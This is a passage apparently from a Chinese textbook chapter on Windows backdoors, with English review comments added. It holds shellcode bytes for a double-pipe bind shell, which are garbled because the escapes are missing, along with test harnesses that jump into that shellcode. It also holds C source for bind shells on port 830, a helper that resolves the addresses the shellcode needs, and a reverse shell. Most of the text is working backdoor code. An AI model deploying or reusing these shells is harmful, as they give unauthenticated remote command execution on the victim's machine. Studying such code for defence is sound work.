push [ebp+68]
call [ebp+16]
jmp loop1
end:
}
return 0;
}
2)测试双管道ShellCode的方法一
#include
/*
 * Listing 7-2: the double-pipe bind shell of listing 7-1 as machine code.
 *
 * NOTE(review): in this copy every "\x" escape has lost its backslash
 * (extraction damage), so as printed this is an ASCII string, not bytes,
 * and cannot be executed as-is.  Read as hex pairs it matches 7-1:
 * 55 83 EC 50 8B EC = push ebp / sub esp,80 / mov ebp,esp; the
 * B8 xx xx xx xx 89 45 nn groups store the thirteen hard-coded
 * kernel32/ws2_32 addresses into the [ebp+4..ebp+52] table; the
 * C6 45 38 00 ... C6 45 48 00 run shows the "mov [ebp+56],0" lines
 * assembled as byte stores; EB C3 and EB A4 at the end are the two
 * "jmp loop1" back-edges.  The addresses are for one build only ("xp sp0")
 * and meaningless under ASLR; everything else is position-independent.
 * As a global array in a writable section it can only be jumped to where
 * DEP/NX is not enforced, and the blob expects ws2_32.dll to be mapped
 * already.
 */
unsigned char ShellCode[] =
"x55x83xECx50x8BxECxB8x7Ax72xE5x77x89x45x04xB8xB8"
"x1BxE4x77x89x45x08xB8x24x76xE9x77x89x45x0CxB8x8C"
"x9DxE5x77x89x45x10xB8x82x8BxE5x77x89x45x14xB8xB5"
"x5CxE5x77x89x45x18xB8xDAx41xA2x71x89x45x1CxB8x22"
"x3CxA2x71x89x45x20xB8xCEx3ExA2x71x89x45x24xB8xE2"
"x5DxA2x71x89x45x28xB8x8Dx86xA2x71x89x45x2CxB8xF4"
"x1AxA2x71x89x45x30xB8x90x56xA2x71x89x45x34xB8x00"
"x00x00x00xC6x45x38x00xC6x45x3Cx00xC6x45x40x00xC6"
"x45x44x00xC6x45x48x00x81xECx90x01x00x00x54x68x02"
"x02x00x00xFFx55x1Cx6Ax06x6Ax01x6Ax02xFFx55x20x8B"
"xD8x33xFFx57x57xB8x02x00x03x3Ex50x8BxF4x6Ax10x56"
"x53xFFx55x24x47x47x57x53xFFx55x28x6Ax10x8Dx3Cx24"
"x57x56x53xFFx55x2Cx8BxD8x33xFFx47x57x33xFFx57x6A"
"x0Cx8BxF4x57x56x8Dx45x3Cx50x8Dx45x38x50xFFx55x04"
"x57x56x8Dx45x44x50x8Dx45x40x50xFFx55x04x81xECx80"
"x00x00x00x8Dx3Cx24x33xC0x68x80x00x00x00x59xF3xAB"
"x8Dx3Cx24xB8x01x01x00x00x89x47x2Cx8Bx45x40x89x47"
"x38x8Bx45x3Cx89x47x3Cx8Bx45x3Cx89x47x40xB8x63x6D"
"x64x00x89x47x64x8Dx44x24x44x50x57x51x51x51x41x51"
"x49x51x51x8Dx47x64x50x51xFFx55x08x81xECx00x04x00"
"x00x8BxF4x33xC9x51x51x8Dx7Dx48x57xB8x00x04x00x00"
"x50x56x8Bx45x38x50xFFx55x0Cx8Bx07x85xC0x74x19x33"
"xC9x51x57xFFx37x56xFFx75x38xFFx55x14x33xC9x51xFF"
"x37x56x53xFFx55x30xEBxC3x33xC9x51xB8x00x04x00x00"
"x50x56x53xFFx55x34x89x07x33xC9x51x57xFFx37x56xFF"
"x75x44xFFx55x10xEBxA4";
/*
 * Test harness 7-2: jump into the ShellCode byte array through a C
 * function-pointer cast.
 *
 * WS2_32.DLL is loaded first because the blob reaches ws2_32 exports
 * through hard-coded addresses and never loads the DLL itself.  The array
 * is ordinary writable data, so this only runs where DEP/NX is off, and
 * the asm it was built from (listing 7-1) loops forever, so the call never
 * returns in practice.
 */
int main()
{
    void (*entry)(void);

    LoadLibrary("WS2_32.DLL");
    entry = (void (*)(void))ShellCode;   /* same address as &ShellCode */
    entry();
    return 0;
}
3)测试双管道ShellCode的方法二。
#include
/*
 * Listing 7-3's copy of the double-pipe bind shell bytes -- identical to
 * the array in 7-2; see the remarks there.  In this copy, too, every "\x"
 * escape has lost its backslash (extraction damage), so as printed this is
 * an ASCII string rather than machine code.  The thirteen hard-coded
 * kernel32/ws2_32 addresses are for one build only ("xp sp0"); the array
 * is writable data, so it can only be jumped to where DEP/NX is not
 * enforced, and ws2_32.dll must already be mapped.
 */
unsigned char ShellCode[] =
"x55x83xECx50x8BxECxB8x7Ax72xE5x77x89x45x04xB8xB8"
"x1BxE4x77x89x45x08xB8x24x76xE9x77x89x45x0CxB8x8C"
"x9DxE5x77x89x45x10xB8x82x8BxE5x77x89x45x14xB8xB5"
"x5CxE5x77x89x45x18xB8xDAx41xA2x71x89x45x1CxB8x22"
"x3CxA2x71x89x45x20xB8xCEx3ExA2x71x89x45x24xB8xE2"
"x5DxA2x71x89x45x28xB8x8Dx86xA2x71x89x45x2CxB8xF4"
"x1AxA2x71x89x45x30xB8x90x56xA2x71x89x45x34xB8x00"
"x00x00x00xC6x45x38x00xC6x45x3Cx00xC6x45x40x00xC6"
"x45x44x00xC6x45x48x00x81xECx90x01x00x00x54x68x02"
"x02x00x00xFFx55x1Cx6Ax06x6Ax01x6Ax02xFFx55x20x8B"
"xD8x33xFFx57x57xB8x02x00x03x3Ex50x8BxF4x6Ax10x56"
"x53xFFx55x24x47x47x57x53xFFx55x28x6Ax10x8Dx3Cx24"
"x57x56x53xFFx55x2Cx8BxD8x33xFFx47x57x33xFFx57x6A"
"x0Cx8BxF4x57x56x8Dx45x3Cx50x8Dx45x38x50xFFx55x04"
"x57x56x8Dx45x44x50x8Dx45x40x50xFFx55x04x81xECx80"
"x00x00x00x8Dx3Cx24x33xC0x68x80x00x00x00x59xF3xAB"
"x8Dx3Cx24xB8x01x01x00x00x89x47x2Cx8Bx45x40x89x47"
"x38x8Bx45x3Cx89x47x3Cx8Bx45x3Cx89x47x40xB8x63x6D"
"x64x00x89x47x64x8Dx44x24x44x50x57x51x51x51x41x51"
"x49x51x51x8Dx47x64x50x51xFFx55x08x81xECx00x04x00"
"x00x8BxF4x33xC9x51x51x8Dx7Dx48x57xB8x00x04x00x00"
"x50x56x8Bx45x38x50xFFx55x0Cx8Bx07x85xC0x74x19x33"
"xC9x51x57xFFx37x56xFFx75x38xFFx55x14x33xC9x51xFF"
"x37x56x53xFFx55x30xEBxC3x33xC9x51xB8x00x04x00x00"
"x50x56x53xFFx55x34x89x07x33xC9x51x57xFFx37x56xFF"
"x75x44xFFx55x10xEBxA4";
/*
 * Test harness 7-3: same as 7-2, but the jump is done in inline asm
 * (lea eax, ShellCode / call eax) instead of a C function-pointer cast.
 * Same caveats: WS2_32.DLL must already be mapped because the blob never
 * loads it; the array is writable data, so this needs DEP/NX off; the
 * shellcode loops forever, so the call never returns.
 */
int main()
{
LoadLibrary("WS2_32.DLL");
//(void (*) (void) )&ShellCode() ;   -- the C form used by harness 7-2
__asm
{
lea eax, ShellCode;  address of the byte array
call eax;            enter it -- does not return
}
return 0;
}
4)双管道后门c实现。
#include
#include
#pragma comment(lib,"Ws2_32")
/*
 * Listing 7-4: the double-pipe bind shell in C -- the reference for the asm
 * in 7-1.  Listens on 0.0.0.0:830, accepts one client, starts a hidden
 * cmd.exe whose stdin is pipe 2 and whose stdout/stderr are pipe 1, then
 * shuttles bytes between the client socket and the two pipes.
 *
 * NOTE(review), before reusing any of this:
 *  - No authentication and no encryption: whoever reaches port 830 gets a
 *    shell with this process's token.
 *  - lBytesRead is unsigned long, so "if(lBytesRead<=0)" after recv() only
 *    catches 0 (peer closed); SOCKET_ERROR (-1) becomes 0xFFFFFFFF, passes
 *    the test and is handed to WriteFile as a 4 GiB length.
 *  - PeekNamedPipe is polled once per pass and the else branch blocks in
 *    recv(), so output cmd.exe produces after the poll is not forwarded
 *    until the client sends something else (a short Sleep or a select() on
 *    the socket is the usual fix).
 *  - si.cb is never set (CreateProcess documents it as required);
 *    pipeattr.nLength = 12 is sizeof(SECURITY_ATTRIBUTES) on 32-bit only.
 *  - Every result assigned to ret before the loop is ignored; the
 *    process/thread handles and the parent's copies of the child-side pipe
 *    ends are never closed, and bInheritHandle is set on all four ends, so
 *    cmd.exe also inherits the parent's ends.
 */
int main()
{
WSADATA ws;
SOCKET listenFD;
char Buff[1024];
int ret;
//initialise Winsock (result ignored)
WSAStartup(MAKEWORD(2,2),&ws);
//create the listening socket
listenFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
//listen on local port 830, all interfaces; bind/listen results go to ret and are ignored
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_port = htons(830);
server.sin_addr.s_addr=ADDR_ANY;
ret=bind(listenFD,(sockaddr *)&server,sizeof(server));
ret=listen(listenFD,2);
//block until a client connects to 830, then accept it (no INVALID_SOCKET check)
int iAddrSize = sizeof(server);
SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);
SECURITY_ATTRIBUTES pipeattr1, pipeattr2;
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
//anonymous pipe 1: cmd.exe -> us.  nLength = 12 is the 32-bit sizeof(SECURITY_ATTRIBUTES);
//bInheritHandle on both ends means the child also inherits our read end
pipeattr1.nLength = 12;
pipeattr1.lpSecurityDescriptor = 0;
pipeattr1.bInheritHandle = true;
CreatePipe(&hReadPipe1,&hWritePipe1,&pipeattr1,0);
//anonymous pipe 2: us -> cmd.exe
pipeattr2.nLength = 12;
pipeattr2.lpSecurityDescriptor = 0;
pipeattr2.bInheritHandle = true;
CreatePipe(&hReadPipe2,&hWritePipe2,&pipeattr2,0);
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
//si.cb stays 0 here although CreateProcess documents it as required (only listing 7-8 sets it)
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = hReadPipe2;
si.hStdOutput = si.hStdError = hWritePipe1;
char cmdLine[] = "cmd";
PROCESS_INFORMATION ProcessInformation;
//start the child; bInheritHandles = 1 so the std handles above are valid inside it
ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
/*
Explanation: this starts a cmd.exe whose standard output and standard
error are replaced by the write end of pipe 1, and whose standard input
is replaced by the read end of pipe 2:
(remote host)<-- send <- pipe 1 read end <- pipe 1 write end <- stdout (cmd.exe child)
(remote host)--> recv -> pipe 2 write end -> pipe 2 read end -> stdin (cmd.exe child)
*/
unsigned long lBytesRead;
while(1)
{
//check pipe 1, i.e. whether cmd.exe has produced output (non-blocking peek, up to 1024 bytes)
ret=PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);
if(lBytesRead)
{
//pipe 1 has data: read it and send it to the remote client
ret=ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
if(!ret) break;
ret=send(clientFD,Buff,lBytesRead,0);
if(ret<=0) break;
}
else
{
//otherwise block waiting for the client's next command
lBytesRead=recv(clientFD,Buff,1024,0);
//lBytesRead is unsigned: this only catches 0 (peer closed); SOCKET_ERROR becomes 0xFFFFFFFF and falls through to WriteFile
if(lBytesRead<=0) break;
//write the command into pipe 2, i.e. cmd.exe's stdin
ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
if(!ret) break;
}
}
return 0;
}
5)单管道后门c实现。
#include
#include
#include
#pragma comment(lib,"Ws2_32")
/*
 * Listing 7-5: single-pipe bind shell.  Instead of one long-lived cmd.exe
 * with a stdin pipe, every command received from the client starts a fresh
 * "cmd.exe /c<command>" whose stdout/stderr go to pipe 1; the pipe is then
 * drained back to the client on the next pass.
 *
 * NOTE(review):
 *  - strncat(cmdLine, Buff, lBytesRead) is a stack buffer overflow driven
 *    by the network: cmdLine is 200 bytes and already holds "cmd.exe /c"
 *    (10 chars), while Buff can carry up to 1024 bytes from recv().
 *  - lBytesRead is unsigned long, so "<=0" only catches 0; SOCKET_ERROR
 *    becomes 0xFFFFFFFF and is passed on as a length.
 *  - STARTF_USESTDHANDLES is set but hStdInput is left NULL (the
 *    hReadPipe2 line is commented out), so the child has no usable stdin.
 *  - There is no space after "/c", so the command is glued to the switch
 *    ("cmd.exe /cdir"); cmd.exe appears to tolerate this.
 *  - si.cb is never set; nLength = 12 is the 32-bit sizeof; one
 *    PROCESS_INFORMATION pair of handles leaks per command; output of a
 *    command is only forwarded when PeekNamedPipe sees it on a later pass.
 *  - No authentication: whoever reaches port 830 runs commands with this
 *    process's token.
 */
int main()
{
WSADATA ws;
SOCKET listenFD;
char Buff[1024];
int ret;
//initialise Winsock (result ignored)
WSAStartup(MAKEWORD(2,2),&ws);
//create the listening socket
listenFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
//listen on local port 830, all interfaces; results go to ret and are ignored
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_port = htons(830);
server.sin_addr.s_addr=ADDR_ANY;
ret=bind(listenFD,(sockaddr *)&server,sizeof(server));
ret=listen(listenFD,2);
//block until a client connects to 830, then accept it (no INVALID_SOCKET check)
int iAddrSize = sizeof(server);
SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);
SECURITY_ATTRIBUTES pipeattr1;
HANDLE hReadPipe1,hWritePipe1;
//anonymous pipe 1: cmd.exe -> us; both ends inheritable
pipeattr1.nLength = 12;
pipeattr1.lpSecurityDescriptor = 0;
pipeattr1.bInheritHandle = true;
CreatePipe(&hReadPipe1,&hWritePipe1,&pipeattr1,0);
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
//si.hStdInput = hReadPipe2;   -- no stdin pipe in this variant; hStdInput stays NULL
si.hStdOutput = si.hStdError = hWritePipe1;
PROCESS_INFORMATION ProcessInformation;
char cmdLine[200];
unsigned long lBytesRead;
/*
Run cmd.exe with the received command as its argument:
(remote host)--> command -> new cmd.exe child started with the command as argument
(remote host)<-- send <- pipe 1 read end <- pipe 1 write end <- stdout (cmd.exe child)
*/
while(1)
{
//check pipe 1, i.e. whether a cmd.exe child has produced output
ret=PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);
if(lBytesRead)
{
//pipe 1 has data: read it and send it to the remote client
ret=ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
if(!ret) break;
ret=send(clientFD,Buff,lBytesRead,0);
if(ret<=0) break;
}
else
{
//otherwise block waiting for the client's next command
lBytesRead=recv(clientFD,Buff,1024,0);
//unsigned compare: only 0 is caught, SOCKET_ERROR (0xFFFFFFFF) is not
if(lBytesRead<=0) break;
strcpy(cmdLine, "cmd.exe /c");//cd & dir  (example commands); note: no space after /c
//cmdLine is 200 bytes, 10 already used; Buff holds up to 1024 bytes of network input,
//so this strncat can overrun cmdLine by several hundred bytes -- a client-controlled stack overflow
strncat(cmdLine, Buff, lBytesRead);
//run the command through a new cmd.exe; the returned handles are never closed
CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
}
}
return 0;
}
6)自动查找双管道后门所用函数地址。
#include
#include
typedef void (*MYPROC)(LPTSTR);
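/*
 * Listing 7-6: resolve and print the kernel32 / ws2_32 exports used by the
 * double-pipe shellcode (listing 7-1), in the same order as its slot table,
 * so the hard-coded constants can be regenerated for another build.
 *
 * Fixes vs. the original: the "\n" escapes had become literal line breaks
 * and pointers were printed through "%x"; a NULL module handle went
 * straight into GetProcAddress.  The lookups are table-driven, which keeps
 * the list easy to diff against the slot table in 7-1.  The values are only
 * valid for this build and, on systems with ASLR, only for this boot.
 *
 * Returns 0 when both modules load, 1 otherwise (individual exports that
 * fail to resolve print as a NULL pointer).
 */
int main()
{
    static const char *const kernel32_names[] = {
        "CreatePipe", "CreateProcessA", "PeekNamedPipe",
        "WriteFile", "ReadFile", "ExitProcess"
    };
    static const char *const ws2_32_names[] = {
        "WSAStartup", "socket", "bind", "listen", "accept", "send", "recv"
    };
    HINSTANCE LibHandle;
    MYPROC ProcAdd;
    size_t i;

    LibHandle = LoadLibrary("kernel32");
    printf("kernel32 LibHandle = %p\n", (void *)LibHandle);
    if (LibHandle == NULL)
        return 1;
    for (i = 0; i < sizeof(kernel32_names) / sizeof(kernel32_names[0]); i++) {
        ProcAdd = (MYPROC)GetProcAddress(LibHandle, kernel32_names[i]);
        printf("%s = %p\n", kernel32_names[i], (void *)ProcAdd);
    }

    LibHandle = LoadLibrary("ws2_32");
    printf("ws2_32 LibHandle = %p\n", (void *)LibHandle);
    if (LibHandle == NULL)
        return 1;
    for (i = 0; i < sizeof(ws2_32_names) / sizeof(ws2_32_names[0]); i++) {
        ProcAdd = (MYPROC)GetProcAddress(LibHandle, ws2_32_names[i]);
        printf("%s = %p\n", ws2_32_names[i], (void *)ProcAdd);
    }
    return 0;
}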
/*
"CreatePipe" 4
"CreateProcessA"8
"PeekNamedPipe"12
"WriteFile"16
"ReadFile"20
"ExitProcess"24
"WSAStartup"28
"socket"32
"bind"36
"listen"40
"accept"44
"send"48
"recv"52
*/
7)零管道后门c实现
#include
#include
#pragma comment(lib,"Ws2_32")
/*
 * Listing 7-7: "zero-pipe" bind shell -- the accepted socket itself is
 * handed to cmd.exe as stdin/stdout/stderr, so no relay loop is needed and
 * the parent exits right after CreateProcess.
 *
 * NOTE(review):
 *  - WSASocket with dwFlags = 0 is used instead of socket() so the handle
 *    is a plain non-overlapped one; socket() creates an overlapped socket
 *    by default, which a child cannot drive through its std handles (the
 *    original comment only says "note: must use WSASocket").
 *  - si.wShowWindow is assigned twice; the second value (SW_SHOWNORMAL)
 *    wins, so the console window is visible -- presumably a debugging
 *    leftover.
 *  - si.cb is never set; every result is ignored (bind/listen/accept
 *    failures still lead to CreateProcess on an invalid handle); the
 *    process/thread handles and both sockets are never closed, although
 *    the child keeps its inherited copy of clientFD alive.
 *  - No authentication: whoever reaches port 830 gets a shell with this
 *    process's token.
 */
int main()
{
WSADATA ws;
SOCKET listenFD;
int ret;
//initialise Winsock (result ignored)
WSAStartup(MAKEWORD(2,2),&ws);
//note: must be WSASocket with dwFlags = 0 -> non-overlapped handle, usable as a child's std handle
listenFD = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
//listen on local port 830, all interfaces; results ignored
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_port = htons(830);
server.sin_addr.s_addr=ADDR_ANY;
ret=bind(listenFD,(sockaddr *)&server,sizeof(server));
ret=listen(listenFD,2);
//block until a client connects to 830, then accept it (no INVALID_SOCKET check)
int iAddrSize = sizeof(server);
SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.wShowWindow = SW_SHOWNORMAL; //overrides the SW_HIDE above: the console window ends up visible
si.hStdInput = si.hStdOutput = si.hStdError = (void *)clientFD;
char cmdLine[] = "cmd.exe";
PROCESS_INFORMATION ProcessInformation;
//start cmd.exe on the socket; si.cb is left 0; the socket is inherited because bInheritHandles = 1
ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
return 0;
}
8)反向后门的c实现。
#include
#include
#pragma comment(lib,"Ws2_32")
/*
 * Listing 7-8: reverse shell.  Connects out to 127.0.0.1:830 and hands the
 * socket to a hidden cmd.exe as stdin/stdout/stderr.  Outbound rather than
 * listening, so it needs no open port on the host and passes inbound-only
 * firewalls.
 *
 * NOTE(review):
 *  - connect() is unchecked: if nothing listens on 830, cmd.exe is still
 *    started on an unconnected socket.
 *  - The peer is hard-coded to loopback, so as written it only talks to a
 *    listener on the same machine.
 *  - This is the only listing that sets si.cb.  WSASocket with dwFlags = 0
 *    is used for the same reason as in 7-7 (a non-overlapped handle).
 *  - No handle or socket is ever closed, and the peer is not authenticated:
 *    whatever answers on that port gets the shell.
 */
int main()
{
WSADATA ws;
SOCKET s;
int ret;
//initialise Winsock (result ignored)
WSAStartup(MAKEWORD(2,2),&ws);
//non-overlapped socket (dwFlags = 0) so the child can use it as a std handle
s=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
//peer: port 830 on loopback (hard-coded)
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_port = htons(830);
server.sin_addr.s_addr=inet_addr("127.0.0.1");
//reverse connection -- result not checked
connect(s,(struct sockaddr *)&server,sizeof(server) );
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
//cmd.exe's stdin, stdout and stderr all become the socket
si.hStdInput = si.hStdOutput = si.hStdError = (void *)s;
char cmdLine[] = "cmd.exe";
PROCESS_INFORMATION ProcessInformation;
//start the child; bInheritHandles = 1 so it receives the socket handle
ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
return 0;
}